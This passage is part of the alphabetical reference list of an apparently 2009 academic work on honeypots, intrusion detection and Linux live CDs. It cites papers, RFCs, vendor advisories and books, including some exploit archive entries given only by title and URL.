[Deloitte 2009] Deloitte (Editor): Losing Ground - TMT Global Security Survey. Published: 2009. http://www.deloitte.com/dtt/cda/doc/content/me_fsi_
281106_globalsecuritysurvey.pdf, Retrieved: August 11, 2009
[Dent 2002] Dent, Kyle D.: Postfix: The Definitive Guide. O’Reilly, 2002
[Dike 2006] Dike, Jeff: User Mode Linux. Prentice Hall, 2006
[DistroWatch 2007] DistroWatch (Editor): Linux Distributions - Facts and Figures.
Published: July 2007. http://distrowatch.com/stats.php?section=popularity,
[Dong-Hun 2003] Dong-Hun, You: Wu-FTPd v2.6.2 Off-by-One Remote 0day Exploit. Published: 2003. http://www.milw0rm.com/exploits/74, Retrieved: August 11, 2009
[Dornseif et al. 2004a] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian:
NoSEBrEaK - Attacking Honeynets. In: Procceedings of the 5th Annual IEEE Information Assurance Workshop, 2004
159
References
[Dornseif et al. 2004b] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian N.:
NoSEBrEaK - Defeating Honeynets. Published: 2004. http://www.blackhat.
com/presentations/bh-usa-04/bh-us-04-holz/bh-us-04-holz-up.pdf,
[Dougherty and Robbins 1997] Dougherty, Dale ; Robbins, Arnold: Sed & Awk.
O’Reilly, 1997
[Ducea 2006] Ducea, Marius: Rotating Linux Log Files. Published: 2006. http://www.
ducea.com/2006/06/06/rotating-linux-log-files/, Retrieved: August 11, 2009
[Eckstein et al. 2007] Eckstein, Robert ; Watters, Paul A. ; Ts, Jay ; Carter,
Gerald: Using Samba. 3rd Edition. O’Reilly, 2007
[Eddy 2007] Eddy, Wesley M.: RFC: 4987 - TCP SYN Flooding Attacks and Common Mitigations. Published: 2007. http://www.ietf.org/rfc/rfc4987.txt, Retrieved: August 11, 2009
[Elnahrawy 2002] Elnahrawy, Eiman M.: Log-Based Chat Room Monitoring Using
Text Categorization: A Comparative Study. In: Proceedings of the Proceedings of the
International Conference on Information and Knowledge Sharing, 2002
[Eurostats 2008] Eurostats (Editor): European Consumer Summit - Online Shopping
by Individuals in EU27. Published: 2008. http://epp.eurostat.ec.europa.eu,
[Farmer and Venema 2005] Farmer, Dan ; Venema, Wietse:
Addison Wesley, 2005
Forensic Discovery.
[Feinstein and Peck 2007] Feinstein, Ben ; Peck, Daniel:
Caffeine Monkey: Automated Colleciton, Detection and Analysis of JavaScript. Published:
2007.
http://www.secureworks.com/research/blog/wp-content/uploads/
bh-usa-07-feinstein_and_peck-WP.pdf, Retrieved: August 11, 2009
[Fishbein and Ajzen 1975] Fishbein, Martin ; Ajzen, Icek: Belief, Attitude, Intention
and Behavior: An Introduction to Theory and Research. Addison Wesley, 1975
[Flenov 2005] Flenov, Michael: Hacker Linux Uncovered. A-LIST, 2005
[Floydman 2002] Floydman: ComLog.pl - A WIN32 Command Prompt Logger.
Published: 2002. http://www.geocities.com/floydian_99/comlog.html, Retrieved: August 11, 2009
[Fötinger and Ziegler 2004] Fötinger, Christian S. ; Ziegler, Wolfgang: Understanding a Hackers Mind A Psychological Insight into the Hijacking of Identities. May
2004
160
References
[Franklin and Paxson 2007] Franklin, Jason ; Paxson, Vern: An Inquiry into the
Nature and Causes of the Wealth of Internet Miscreants. In: Proceedings of the 14th
ACM Conference on Computer and Communications Security, 2007
[Free Software Foundation 2007] Free Software Foundation (Editor): GNU General Public License. Published: 2007. http://www.gnu.org/licenses/gpl-3.0.
[Friedl 2006] Friedl, Jeffrey E. F.: Mastering Regular Expressions. O’Reilly, 2006
[Friedl 2002] Friedl, Steve:
Best Practices for UNIX chroot() Operations.
Published: 2002. http://www.unixwiz.net/techtips/chroot-practices.html,
[FrozenTech 2004a] FrozenTech (Editor): What is Your Favorite Full-Featured
Desktop Live CD? Published: November 2004. http://www.livecdforums.com/
viewtopic.php?t=149, Retrieved: August 11, 2009
[FrozenTech 2004b] FrozenTech (Editor): What LiveCD has the Best Hardware Support? Published: November 2004. http://www.livecdforums.com/viewtopic.
php?t=153, Retrieved: August 11, 2009
[FrozenTech 2005a] FrozenTech (Editor): What is the Easiest LiveCD to Customize?
Published: July 2005. http://www.livecdforums.com/viewtopic.php?t=417, Retrieved: August 11, 2009
[FrozenTech 2005b] FrozenTech (Editor): What is Your Favorite PowerPC LiveCD?
Published: March 2005. http://www.livecdforums.com/viewtopic.php?t=313,
[Garfinkel et al. 2007] Garfinkel, Tal ; Adams, Keith ; Warfield, Andrew ;
Franklin, Jason: Compatibility is Not Transparency: VMM Detection Myths and
Realities. In: Proceedings of the 11th USENIX workshop on Hot topics in operating
systems, 2007
[Garland 2008] Garland, Jason: Wireshark - Secure Socket Layer (SSL). Published:
2008. http://wiki.wireshark.org/SSL, Retrieved: August 11, 2009
[GNU Free Software Foundation 2009] GNU Free Software Foundation (Editor):
Bash Reference Manual. Published: 2009. http://www.gnu.org/software/bash/
manual/bashref.html, Retrieved: August 11, 2009
[Göbel et al. 2006] Göbel, Jan ; Hektor, Jens ; Holz, Thorsten: Advanced HoneypotBased Intrusion Detection. In: The USENIX Magazine 31 (2006), December, No. 6,
p. 17–25
161
References
[Goebel et al. 2007] Goebel, Jan ; Holz, Thorsten ; Willems, Carsten: Measurement
and Analysis of Autonomous Spreading Malware in a University Environment. In: 4th
GI International Conference on Detection of Intrusions & Malware, and Vulnerability
Assessment, 2007
[Goldberg 1974] Goldberg, Robert P.: Survey of Virtual Machine Research. In: IEEE
Computer 7 (1974), No. 6, p. 34–45
[Gortmaker 2004] Gortmaker, Paul ; Linux Kernel Organization (Editor):
Using the RAM Disk Block Device with Linux.
Published: October
2004. http://www.kernel.org/doc/Documentation/blockdev/ramdisk.txt, Retrieved: August 11, 2009
[Hall 2005] Hall, Ronald J.: KDE Frequently Asked Questions: Description of the
Base Packages. Published: January 2005. http://docs.kde.org/development/en/
kdebase-runtime/faq/index.html, Retrieved: August 11, 2009
[Handelman et al. 1999] Handelman, Sigmund ; Stibler, Stephen ; Brownlee, Nevil
; Ruth, Gregory R.: RFC: 2724 - New Attributes for Traffic Flow Measurement.
Published: 1999. http://www.rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009
[Handley et al. 2001] Handley, Mark ; Paxson, Vern ; Kreibich, Christian: Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol
Semantics. In: Proceedings of the 10th conference on USENIX Security Symposium,
2001
[Handley and Rescorla 2006] Handley, Mark ; Rescorla, Eric: RFC: 4732 - Internet Denial-of-Service Considerations. Published: November 2006. http://www.
rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009
[Hansen and Atkins 1993] Hansen, Stephen E. ; Atkins, Todd: Automated System
Monitoring and Notification With Swatch. In: Proceedings of the 7th USENIX Conference on System Administration, 1993, p. 145–152
[Henderson 2006] Henderson, Bryan: Introduction to Linux Loadable Kernel Modules. Published: 2006. http://tldp.org/HOWTO/Module-HOWTO/index.html, Retrieved: August 11, 2009
[Hollinger 1988] Hollinger, Richard C.: Computer Hackers Follow a Guttman-Like
Progression. In: Social Sciences Review 72 (1988), p. 199–200
[Holz 2005] Holz, Thorsten: A Short Visit to the Bot Zoo. In: IEEE Security & Privacy
3 (2005), No. 3, p. 76–79
162
References
[Holz 2006] Holz, Thorsten: Learning More About Attack Patterns With Honeypots.
In: Proceedings of Sicherheit - Schutz und Zuverlässigkeit, 2006
[Holz 2008] Holz, Thorsten: Collecting Malware - The Techniques Behind Nepenthes
& Mwcollect. Published: 2008. http://www.sitic.se/seminarium/sitic_vs2006/
nepenthes2.pdf, Retrieved: August 11, 2009
[Holz et al. 2006] Holz, Thorsten ; Marechal, Simon ; Raynal, Frederic: New
Threats and Attacks on the World Wide Web. In: IEEE Security & Privacy 4 (2006),
No. 2, p. 72–75
[Holz and Raynal 2005a] Holz, Thorsten ; Raynal, Frederic: Defeating Honeypots:
System Issues, Part 2. Published: 2005. http://www.securityfocus.com/infocus/
[Holz and Raynal 2005b] Holz, Thorsten ; Raynal, Frederic: Detecting Honeypots
and Other Suspicious Environments. In: Proceedings of the IEEE Workshop on Information Assurance and Security, 2005, p. 29–36
[Honeynet Project 2000a] Honeynet Project (Editor): Know Your Enemy: Motives. Published: 2000. http://old.honeynet.org/papers/motives/index.html,
[Honeynet Project 2000b] Honeynet Project (Editor): Know Your Enemy: The
Tools and Methodologies of the Script Kiddie. Published: 2000. http://old.
honeynet.org/papers/enemy/index.html, Retrieved: August 11, 2009
[Honeynet Project 2002a] Honeynet Project (Editor): Know Your Enemy: Learning
with User-Mode Linux. Published: 2002. http://old.honeynet.org/papers/uml/
index.html, Retrieved: August 11, 2009
[Honeynet Project 2002b] Honeynet Project (Editor): Know your Enemy: Passive Fingerprinting. Published: 2002. http://old.honeynet.org/papers/finger/,
[Honeynet Project 2003a] Honeynet Project (Editor): Know Your Enemy: A Profile. Published: 2003. http://old.honeynet.org/papers/profiles/cc-fraud.
pdf, Retrieved: August 11, 2009
[Honeynet Project 2003b] Honeynet Project (Editor): Know Your Enemy: Defining
Virtual Honeynets. Published: 2003. http://old.honeynet.org/papers/virtual/
index.html, Retrieved: August 11, 2009
[Honeynet Project 2003c] Honeynet Project (Editor): Know Your Enemy: Sebek.
Published: 2003. http://old.honeynet.org/papers/sebek.pdf, Retrieved: August 11, 2009
163
References
[Honeynet Project 2004a] Honeynet Project (Editor): Honeynet Definitions, Requirements, and Standards. Published: 2004. http://old.honeynet.org/alliance/
requirements.html, Retrieved: August 11, 2009
[Honeynet Project 2004b] Honeynet Project (Editor): Know your Enemy - Learning
about Security Threats. Addison Wesley, 2004
[Honeynet Project 2004c] Honeynet Project (Editor): Know Your Enemy: Honeynets in Universities. Published: 2004. http://old.honeynet.org/papers/edu/,
[Honeynet Project 2005a] Honeynet Project (Editor): Honeywall Configuration
File. Published: 2005. http://yum.honeynet.org/roo/manual/txt/honeywall.
conf, Retrieved: August 11, 2009
[Honeynet Project 2005b] Honeynet Project (Editor): Honeywall Initial Tripwire
Setup. Published: 2005. http://yum.honeynet.org/roo/manual/txt/tripwire.
txt, Retrieved: August 11, 2009
[Honeynet Project 2005c] Honeynet Project (Editor): Honeywall System Clock Information. Published: 2005. http://yum.honeynet.org/roo/manual/txt/clock.
txt, Retrieved: August 11, 2009
[Honeynet Project 2005d] Honeynet Project (Editor): Know Y our Enemy: Honeywall CDROM Roo. Published: 2005. http://old.honeynet.org/papers/cdrom/
roo/index.html, Retrieved: August 11, 2009
[Honeynet Project 2005e] Honeynet Project (Editor): Know Your Enemy: GenII
Honeynets. Published: 2005. http://old.honeynet.org/papers/gen2/index.
[Honeynet Project 2006] Honeynet Project (Editor): Know Your Enemy: Honeynets. Published: 2006. http://old.honeynet.org/papers/honeynet/index.
[Honeynet Project 2007] Honeynet Project (Editor): Roo - Online User Manual.
Published: 2007. http://old.honeynet.org/tools/cdrom/roo/manual/index.
[iDefense 2005] iDefense (Editor):
Tikiwiki Command Injection Vulnerability.
Published: 2005. http://labs.idefense.com/intelligence/vulnerabilities/
display.php?id=335, Retrieved: August 11, 2009
[Ikinci et al. 2008] Ikinci, Ali ; Holz, Thorsten ; Freiling, Felix: Monkey-Spider:
Detecting Malicious Websites with Low-Interaction Honeyclients. In: Gesellschaft für
Informatik: Sicherheit 2008, 2008
164
References
[Internet Assigned Numbers Authority (IANA) 2008] Internet Assigned Numbers
Authority (IANA) (Editor): Port Numbers. Published: 2008. http://www.iana.
org/assignments/port-numbers, Retrieved: August 11, 2009
[Ithilgore 2008] Ithilgore: Hacking Bash History. Published: July 2008. http:
//sock-raw.org/papers/bash_history, Retrieved: August 11, 2009
[Itzel 2007] Itzel, Laura A.:
Eine Infrastruktur zur Einschatzung des
aktuellen Gefahrdungslevels durch Malware, University of Mannheim, Diplomarbeit, 2007.
http://pi1.informatik.uni-mannheim.de/filepool/theses/
diplomarbeit-2007-itzel.pdf
[Jestrix 2003] Jestrix: An Introduction to psyBNC. Published: 2003. http:
//old.honeynet.org/scans/scan28/sol/5/mirror/psyBNC.htm, Retrieved: August 11, 2009
[Joachims 2002] Joachims, Thorsten: Learning to Classify Text Using Support Vector
Machines - Methods, Theory, and Algorithms. Kluwer Academic Publishers, 2002
[Jones 2006a] Jones, M. T. ; IBM DeveloperWorks (Editor): Inside the Linux
Boot Process. Published: May 2006. http://www.ibm.com/developerworks/linux/
library/l-linuxboot/, Retrieved: August 11, 2008
[Jones 2006b] Jones, M. T. ; IBM DeveloperWorks (Editor): Linux Initial RAM
Disk (initrd) Overview. Published: 2006. http://www.ibm.com/developerworks/
linux/library/l-initrd.html, Retrieved: August 11, 2009
[Jordan 2006] Jordan, Michael J.:
Top Linux Live CD Distributions 2006.
Published: Mai 2006. http://www.linux.org/dist/reviews/livecd_2006.html,
[Jordan and Taylor 1998] Jordan, Tim ; Taylor, Paul: A Sociology of Hackers. In:
The Sociological Review 46 (1998), No. 4, 757-780. http://www.isoc.org/inet98/
proceedings/2d/2d_1.htm
[Jung et al. 2004] Jung, Jaeyeon ; Paxson, Vern ; Berger, Arthur W. ; Balakrishnan, Hari: Fast Portscan Detection Using Sequential Hypothesis Testing. In:
Proceedings of the IEEE Symposium on Security and Privacy, 2004
[Kacper 2006] Kacper: TR Newsportal - Remote File Include. Published: 2006.
http://milw0rm.com/exploits/1789, Retrieved: August 11, 2009
[Keong 2004] Keong, Tan C.: Win2K/XP SDT Restore 0.2. Published: 2004. http:
//www.security.org.sg/code/sdtrestore.html, Retrieved: August 11, 2009
165
References
[Kim and Karp 2004] Kim, Hyang-Ah ; Karp, Brad: Autograph: Toward Automated,
DistributedWorm Signature Detection. In: Proceedings of the 13th Conference on
USENIX Security Symposium, 2004, p. 271286
[Klein 1990] Klein, Daniel V.: “Foiling the Cracker”: A Survey of, and Improvements
to, Password Security. In: Proceedings of the Second USENIX Workshop on Security,
1990
[Knorr 2009] Knorr, Gerd: The VESA Frame Buffer Device.
http://www.kernel.org/doc/Documentation/fb/vesafb.txt,
gust 11, 2009
Published: 2009.
Retrieved: Au-
[Koziol et al. 2004] Koziol, Jack ; Litchfield, David ; Aitel, Dave ; Anley, Chris ;
Eren, Sinan ; Mehta, Neel ; Hassell, Riley: The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley & Sons, 2004
[Kreibich and Crowcroft 2004] Kreibich, Christian ; Crowcroft, Jon: Honeycomb
- Creating Intrusion Detection Signatures Using Honeypots. In: ACM SIGCOMM
Computer Communication Review 34 (2004), No. 1, p. 51–56
[Kroah-Hartman 2006] Kroah-Hartman, Greg: Linux Kernel in a Nutshell. O’Reilly,
2006
[Leckie and Kotagiri 2002] Leckie, Christopher ; Kotagiri, Ramamohanarao: A
Probabilistic Approach to Detecting Network Scans. In: Network Operations and
Management Symposium, 2002
[Levchenko et al. 2004] Levchenko, Kirill ; Paturi, Ramamohan ; Varghese, George:
On the Difficulty of Scalably Detecting Network Attacks. In: Proceedings of the 11th
ACM Conference on Computer and Communications Security, 2004
[Li et al. 2006] Li, Zhichun ; Sanghi, Manan ; Chen, Yan ; Kao, Ming-Yang ; Chavez,
Brian: Hamsa: Fast Signature Generation for Zero-day PolymorphicWorms with
Provable Attack Resilience. In: Proceedings of the 2006 IEEE Symposium on Security
and Privacy, 2006, p. 32–47
[Linux Kernel Organization 2008] Linux Kernel Organization (Editor): The
Linux Kernel Archives. Published: 2008. http://www.kernel.org/, Retrieved: August 11, 2009
[Linux Kernel Organization 2009] Linux Kernel Organization (Editor): Kernel Parameters. Published: 2009. http://www.kernel.org/doc/Documentation/
kernel-parameters.txt, Retrieved: August 11, 2009
[Liu and Cheng 2009] Liu, Simon ; Cheng, Bruce: Cyberattacks: Why, What, Who,
and How. In: IT Professional 11 (2009), No. 3, p. 14–21
166
References
[Lougher and Okajima 2008] Lougher, Phillip ; Okajima, Junjiro: Squashfs LZMA.
Published: March 2008. http://www.squashfs-lzma.org/, Retrieved: August 11,
2008
[Lucks 1998] Lucks, Stefan: Attacking Triple Encryption. In: Proceedings of the 5th
International Workshop on Fast Software Encryption Bd. 1372, 1998, p. 239–253
[Madsys 2003] Madsys: Finding Hidden Kernel Modules. In: Phrack Magazine 61
(2003), No. 6
[Manning et al. 2008] Manning, Christopher D. ; Raghavan, Prabhakar ; Schütze,
Hinrich: An Introduction to Information Retrieval. Cambridge University Press, 2008
[Matejicek 2008a] Matejicek, Tomas: Boot Parameters in Slax. Published: 2008.
http://www.slax.org/documentation_boot_cheatcodes.php,
[Matejicek 2008b] Matejicek, Tomas: Linux Live Scripts. Published: 2008. http:
//www.linux-live.org/, Retrieved: August 11, 2009
[Mates 2008] Mates, Jeremy: OpenSSH Public Key Authentication. Published:
October 2008. http://sial.org/howto/openssh/publickey-auth/, Retrieved: August 11, 2009
[Mazzariello 2008] Mazzariello, Claudio: IRC Traffic Analysis for Botnet Detection.
In: Proceedings of the 2008 The Fourth International Conference on Information Assurance and Security, 2008
[McCarty 2003] McCarty, Bill: Automated Identity Theft. In: IEEE Security &
Privacy 1 (2003), No. 5, p. 89–92
[McClure et al. 2005] McClure, Stuart ; Scambray, Joel ; Kurtz, George: Hacking
Exposed: Network Security Secrets & Solutions. 5th Edition. McGraw-Hill, 2005
[Microsoft Corporation 2002] Microsoft Corporation (Editor): Microsoft Security Bulletin MS02-039. Published: 2002. http://www.microsoft.com/technet/
security/bulletin/MS02-039.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2003a] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-007. Published: 2003. http://www.microsoft.com/technet/
[Microsoft Corporation 2003b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS03-039. Published: 2003. http://www.microsoft.com/technet/
167
References
[Microsoft Corporation 2004a] Microsoft Corporation (Editor): Disabling Messenger Service in Windows XP. Published: Jan 2004. http://www.microsoft.
com/windowsxp/using/security/learnmore/stopspamv45.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2004b] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-007. Published: 2004. http://www.microsoft.com/technet/
security/bulletin/ms04-007.mspx, Retrieved: August 11, 2009
[Microsoft Corporation 2004c] Microsoft Corporation (Editor): Microsoft Security Bulletin MS04-011. Published: 2004. http://www.microsoft.com/technet/
[Microsoft Corporation 2009] Microsoft Corporation (Editor):
Understanding User-Agent Strings. Published: 2009. http://msdn.microsoft.com/en-us/
library/ms537503.aspx, Retrieved: August 11, 2009
[Miniwatts Marketing Group 2008] Miniwatts Marketing Group (Editor): Internet Users in the World - Growth 1995-2010. Published: 2008. http://www.
internetworldstats.com/emarketing.htm, Retrieved: August 11, 2009
[Mirkovic and Reiher 2004] Mirkovic, Jelena ; Reiher, Peter: A Taxonomy of DDoS
Attack and DDoS Defense Mechanisms. In: ACM SIGCOMM Computer Communication Review 34 (2004), No. 2, p. 39–53
[Mokube and Adams 2007] Mokube, Iyatiti ; Adams, Michele: Honeypots: Concepts,
Approaches, and Challenges. In: Proceedings of the 45th Annual Southeast Regional
Conference, ACM Press, 2007, p. 321–326
[Mölsä 2005] Mölsä, Jarmo: Mitigating Denial of Service Attacks: A Tutorial. In:
Journal of Computer Security 13 (2005), No. 6, p. 807–837
[Moore et al. 2003] Moore, David ; Paxson, Vern ; Savage, Stefan ; Shannon,
Colleen ; Staniford, Stuart ; Weaver, Nicholas: Inside the Slammer Worm. In:
IEEE Security & Privacy 1 (2003), July, No. 4
[Moore et al. 2006] Moore, David ; Shannon, Colleen ; Brown, Douglas J. ;
Voelker, Geoffrey M. ; Savage, Stefan: Inferring Internet Denial-of-Service Activity. In: ACM Transactions on Computer Systems 24 (2006), No. 2, p. 115–139
[Mozilla Developer Center 2009] Mozilla Developer Center (Editor): User Agent
Strings Reference. Published: 2009. https://developer.mozilla.org/en/User_
Agent_Strings_Reference, Retrieved: August 11, 2009
168
References
[National Institute of Standards and Technology 1996] National Institute of
Standards and Technology (Editor): An Introduction to Computer Security:
The NIST Handbook. Published: 1996. http://csrc.nist.gov/publications/
nistpubs/800-12/handbook.pdf, Retrieved: August 11, 2009
[Negus 2007] Negus, Christopher: Live Linux CDs - Building and Customizing Bootables. Prentice Hall PTR, 2007
[Net Applications 2009] Net Applications (Editor):
Operating System Market Share.
Published: January 2009.
http://marketshare.hitslink.com/
operating-system-market-share.aspx, Retrieved: August 11, 2009
[NETSEC 2009] NETSEC (Editor): Specter - Intrusion Detection System. Published:
2009. http://www.specter.com/, Retrieved: August 11, 2009
[Newsome et al. 2005] Newsome, James ; Karp, Brad ; Song, Dawn: Polygraph:
Automatically Generating Signatures for Polymorphic Worms. In: Proceedings of the
2005 IEEE Symposium on Security and Privacy, 2005, p. 226–241
[NIST 1999] NIST (Editor): National Institute of Standards and Technology: Data
Encryption Standard. Published: 1999. http://csrc.nist.gov/publications/
fips/fips46-3/fips46-3.pdf, Retrieved: August 11, 2009
[NIST 2001] NIST (Editor): National Institute of Standards and Technology: Advanced Encryption Standard (AES). Published: 2001. http://csrc.nist.gov/
publications/fips/fips197/fips-197.pdf, Retrieved: August 11, 2009
[NIST 2008] NIST (Editor): NSRL - National Software Reference Library. Published:
2008. http://www.nsrl.nist.gov/, Retrieved: August 11, 2009
[OpenSSL Project 2003] OpenSSL Project (Editor): RSA key processing tool.
Published: January 2003. http://www.openssl.org/docs/apps/rsa.html, Retrieved: August 11, 2009
[Orebaugh et al. 2007] Orebaugh, Angela ; Ramirez, Gilbert ; Burke, Josh ; Pesce,
Larry ; Wright, Joshua ; Morris, Greg: Wireshark & Ethereal Network Protocol
Analyzer Toolkit. Syngress Publishing, 2007
[Östling 2006] Östling, Andreas: Oinkmaster Documentation. Published: January
2006.
http://oinkmaster.sourceforge.net/readme.shtml, Retrieved: August 11, 2009
[Osvik et al. 2006] Osvik, Dag A. ; Shamir, Adi ; Tromer, Eran: Cache Attacks and
Countermeasures: The Case of AES. In: RSA Conference, 2006, p. 1–20
169
References
[Paola 2006] Paola, Stefano D.:
MySql COM TABLE DUMP Memory Leak &
MySql Remote B0f.
Published: 2006.
http://downloads.securityfocus.
com/vulnerabilities/exploits/my_com_table_dump_exploit.c, Retrieved: August 11, 2009
[Parmelee et al. 1972] Parmelee, R. P. ; Peterson, T. I. ; Tillman, C. C. ; Hatfield, D. J.: Virtual Storage and Virtual Machine Concepts. In: IBM Journal of
Research and Development 11 (1972), No. 2, p. 99–130
[Paxson 1998] Paxson, Vern: Bro: A System for Detecting Network Intruders in RealTime. In: 7th USENIX Security Symposium, 1998
[Paxson et al. 1998] Paxson, Vern ; Almes, Guy ; Mahdavi, Jamshid ; Mathis,
Mark M.: RFC: 2330 - Framework for IP Performance Metrics. Published: 1998.
ftp://ftp.isi.edu/in-notes/rfc2330.txt, Retrieved: August 11, 2009
[Peng et al. 2007] Peng, Tao ; Leckie, Christopher ; Ramamohanarao, Kotagiri:
Survey of Network-Based Defense Mechanisms Countering the DoS and DDoS Problems. In: ACM Computing Surveys 39 (2007), No. 1
[Perens 1998] Perens, Bruce: The Open Source Definition. Published: 1998. http:
//perens.com/Articles/OSD.html, Retrieved: August 11, 2009
[Perlman 1999] Perlman, Radia: Interconnections. Bridges and Routers. 2nd Edition.
Addison Wesley, 1999
[Pointer 1997] Pointer, Robey: Eggdrop - Main Documentation. Published: 1997.
http://www.eggheads.org/support/egghtml/1.6.19/, Retrieved: August 11, 2009
[Pols 2007] Pols, Dr. A. ; Bundesverband Informationswirtschaft, Telekommunikation und neue Medien e.V. (Editor): E-Commerce 2006. Published:
2007.
http://www.bitkom.org/de/presse/8477_43665.aspx, Retrieved: August 11, 2009
[Postel 1980] Postel, Jonathan: RFC: 768 - User Datagram Protocol. Published:
1980. http://www.faqs.org/rfcs/rfc768.html, Retrieved: August 11, 2009
[Postel 1981a] Postel, Jonathan:
RFC: 791 - Internet Control Message Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc792.html, Retrieved: August 11, 2009
[Postel 1981b] Postel, Jonathan: RFC: 791 - Internet Protocol. Published: 1981.
http://www.faqs.org/rfcs/rfc791.html, Retrieved: August 11, 2009
170
References
[Postel 1981c] Postel, Jonathan:
RFC: 793 - Transmission Control Protocol. Published: 1981. http://www.faqs.org/rfcs/rfc793.html, Retrieved: August 11, 2009
[Pouget et al. 2005] Pouget, Fabien ; Dacier, Marc ; Pham, Van H.: Leurre.com:
On the Advantages of Deploying a Large Scale Distributed Honeypot Platform. In:
Proceedings of the E-Crime and Computer Conference, 2005
[Provos 2004] Provos, Niels: A Virtual Honeypot Framework. In: Proceedings of the
13th USENIX Security Symposium, 2004
[Provos and Holz 2007] Provos, Niels ; Holz, Thorsten: Virtual Honeypots: From
Botnet Tracking to Intrusion Detection. Addison Wesley, 2007
[Ptacek and Newsham 1998] Ptacek, Thomas H. ; Newsham, Timothy N.: Insertion,
Evasion, and Denial of Service: Eluding Network Intrusion Detection. Published:
1998. http://insecure.org/stf/secnet_ids/secnet_ids.html, Retrieved: August 11, 2009
[QoSient 2006] QoSient (Editor): Argus Flow Models. Published: 2006. http:
//www.qosient.com/argus/flow.htm, Retrieved: August 11, 2009
[Raymond 2003] Raymond, Eric S.: The Jargon File, Version 4.4.7. Published:
December 2003. http://www.catb.org/jargon/, Retrieved: August 11, 2009
[Rhino Software 2004] Rhino Software (Editor): How Did Serv-U Get Installed
on My Computer? Published: 2004. http://www.serv-u.com/suvirushack.asp,
[Richardson 2008] Richardson, Robert ; Computer Security Institute (Editor):
CSI Computer Crime & Security Survey 2008. Published: 2008. http://i.cmpnet.
com/v2.gocsi.com/pdf/CSIsurvey2008.pdf, Retrieved: August 11, 2009
[Riden et al. 2007] Riden, Jamie ; McGeehan, Ryan ; Engert, Brian ; Mueter,
Michael: Know your Enemy: Web Application Threats. Published: February 2007.
http://www.honeynet.org/papers/webapp/, Retrieved: August 11, 2009
[Rogers 2000a] Rogers, Marc: A New Hacker Taxonomy. Published: 2000. http:
//homes.cerias.purdue.edu/~mkr/hacker.doc, Retrieved: August 11, 2009
[Rogers 2000b] Rogers, Marc:
Psychological Theories of Crime and “Hacking”. Published: 2000. http://homes.cerias.purdue.edu/~mkr/crime.doc, Retrieved: August 11, 2009
171
References
[Rogers 2001] Rogers, Marc: A Social Learning Theory and Moral Disengagement
Analysis of Criminal Computer Behavior: An Exploratory Study, University of Manitoba, Winnipeg, Manitoba, (PHD Thesis), August 2001. http://homes.cerias.
purdue.edu/~mkr/cybercrime-thesis.pdf
[Rogers 2005] Rogers, Marc: The Development of a Meaningful Hacker Taxonomy:
A Two Dimensional Approach. In: CERIAS Tech Report 2005 (2005), July, No. 43.
https://www.cerias.purdue.edu/assets/pdf/bibtex_archive/2005-43.pdf
[Rowe and Pierce 1982] Rowe, Michael D. ; Pierce, Barbara L.: Sensitivity of the
Weighting Summation Decision Method to Incorrect Application. In: Socio-Economic
Planning Sciences 16 (1982), No. 4, p. 173–177
[Ruef 2007] Ruef, Marc: Die Kunst des Penetration Testing (German). C&L Computer
und Literaturverlag, 2007
[Russell 2002] Russell, Rusty: Linux 2.4 Packet Filtering. Published: 2002. http://
www.netfilter.org/documentation/HOWTO//packet-filtering-HOWTO.html, Retrieved: August 11, 2009
[Russinovich and Solomon 2004] Russinovich, Mark E. ; Solomon, David A.: Microsoft Windows Internals. 4th Edition. Microsoft Press, 2004
[Sadasivam et al. 2005] Sadasivam, Karthik ; Samudrala, Banuprasad ; T. Andrew
Yang: Design of Network Security Projects Using Honeypots. In: Journal of Computing Sciences in Colleges (2005), p. 282 – 293
[Schneier 1996] Schneier, Bruce: Applied Cryptography: Protocols, Algorithms, and
Source Code in C. 2nd Edition. John Wiley & Sons, Inc., 1996
[Sebastiani 2002] Sebastiani, Fabrizio: Machine Learning in Automated Text Categorization. In: ACM Computing Surveys 34 (2002), No. 1, p. 1–47
[Secunia 2004] Secunia (Editor): Secunia Advisories: phpBB Multiple Vulnerabilities. Published: November 2004. http://secunia.com/advisories/13239/2/, Retrieved: August 11, 2009
[Secunia 2009a] Secunia (Editor): Secunia Advisories: Vulnerability Report: phpMyFAQ 1.x. Published: 2009. http://secunia.com/advisories/product/3487/
?task=advisories, Retrieved: August 11, 2009
[Secunia 2009b] Secunia (Editor): Secunia Advisories: Vulnerability Report: Tikiwiki
1.x. Published: 2009. http://secunia.com/advisories/product/3356/?task=
advisories, Retrieved: August 11, 2009
172
References
[SecurityFocus 2004] SecurityFocus (Editor): Microsoft Windows LSASS Buffer
Overrun Vulnerability. Published: 2004. http://www.securityfocus.com/bid/
10108/exploit, Retrieved: August 11, 2009
[SecurityFocus 2006a] SecurityFocus (Editor): MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities.
Published: 2006. http://www.
securityfocus.com/bid/17780/discuss, Retrieved: August 11, 2009
[SecurityFocus 2006b] SecurityFocus (Editor): NewsPortal Remote PHP Script Code
Injection Vulnerability. Published: 2006. http://www.securityfocus.com/bid/
[SecurityFocus 2006c] SecurityFocus (Editor): PHPMyAdmin Multiple Cross-Site
Scripting Vulnerabilities. Published: 2006. http://www.securityfocus.com/bid/
15735/, Retrieved: August 11, 2009
[SecurityFocus 2006d] SecurityFocus (Editor):
Webmin/Usermin Unspecifed
Information Disclosure Vulnerability.
Published: June 2006.
http://www.
securityfocus.com/bid/18744/, Retrieved: August 11, 2009
[Seifert et al. 2006] Seifert, Christian ; Welch, Ian ; Komisarczuk, Peter: HoneyC - The Low-Interaction Client Honeypot. Published: August 2006. http:
//homepages.mcs.vuw.ac.nz/~cseifert/blog/images/seifert-honeyc.pdf, Retrieved: August 11, 2009
[Seigo 2007] Seigo, Aaron J.: KDE Filesystem Hierarchy. Published: February
2007. http://techbase.kde.org/KDE_System_Administration/KDE_Filesystem_
Hierarchy, Retrieved: August 11, 2009
